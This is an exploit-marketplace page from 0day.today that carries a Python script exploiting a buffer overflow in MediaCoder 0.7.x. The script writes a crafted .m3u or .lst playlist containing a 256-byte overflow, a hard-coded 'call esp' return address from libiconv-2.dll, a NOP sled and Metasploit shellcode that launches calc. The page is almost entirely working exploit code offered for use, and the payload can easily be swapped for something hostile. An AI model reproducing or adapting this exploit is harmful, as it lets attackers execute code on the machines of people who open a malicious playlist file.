[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MediaCoder 0.7.x (.m3u & .lst) universal buffer overlow exploit all devices

Author
optix opt
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-8081
Category
local exploits
Date add
27-08-2009
Platform
unsorted
=================================================================================
MediaCoder 0.7.x (.m3u & .lst) universal local buffer overlow exploit all devices
=================================================================================


#usage: exploit.py
print
"**************************************************************************
"
print "download all device's players :
http://www.mediacoderhq.com/device/"
print " MediaCoder 0.7.x (.m3u & .lst) universal local buffer overlow
exploit all devices\n"
print "PSP edition ,MP3/MP4 player ,iPhone/iPod edition and 3GP edition all
old version all vul like 0.6.x etc... "
print " exploiter: opt!x <optix@9.cn>"
print " Tested on: Windows XP Pro SP2 Fr\n"
print "tested under windows XP SP3 (RU) and (FR) and windows xp SP2 (FR)
AND (EN) thank you vmware :="
print
"**************************************************************************
"



buff = "\x41" * 256

ret = "\x5F\x71\x02\x66" # 0x6602715F from libiconv-2.dll call esp

nop = "\x90" * 10

# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub
http://metasploit.com
shellcode = (
"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc9"
"\x2c\xc9\x40\x83\xeb\xfc\xe2\xf4\x35\xc4\x8d\x40\xc9\x2c\x42\x05"
"\xf5\xa7\xb5\x45\xb1\x2d\x26\xcb\x86\x34\x42\x1f\xe9\x2d\x22\x09"
"\x42\x18\x42\x41\x27\x1d\x09\xd9\x65\xa8\x09\x34\xce\xed\x03\x4d"
"\xc8\xee\x22\xb4\xf2\x78\xed\x44\xbc\xc9\x42\x1f\xed\x2d\x22\x26"
"\x42\x20\x82\xcb\x96\x30\xc8\xab\x42\x30\x42\x41\x22\xa5\x95\x64"
"\xcd\xef\xf8\x80\xad\xa7\x89\x70\x4c\xec\xb1\x4c\x42\x6c\xc5\xcb"
"\xb9\x30\x64\xcb\xa1\x24\x22\x49\x42\xac\x79\x40\xc9\x2c\x42\x28"
"\xf5\x73\xf8\xb6\xa9\x7a\x40\xb8\x4a\xec\xb2\x10\xa1\xdc\x43\x44"
"\x96\x44\x51\xbe\x43\x22\x9e\xbf\x2e\x4f\xa8\x2c\xaa\x02\xac\x38"
"\xac\x2c\xc9\x40"
)

exploit = buff + ret + nop + shellcode
try:
out_file = open("media.m3u",'w')#or media.lst
out_file.write(exploit)
out_file.close()
raw_input("\nExploit file created!\n")
except:
print "Error"



#  0day.today [2024-12-26]  #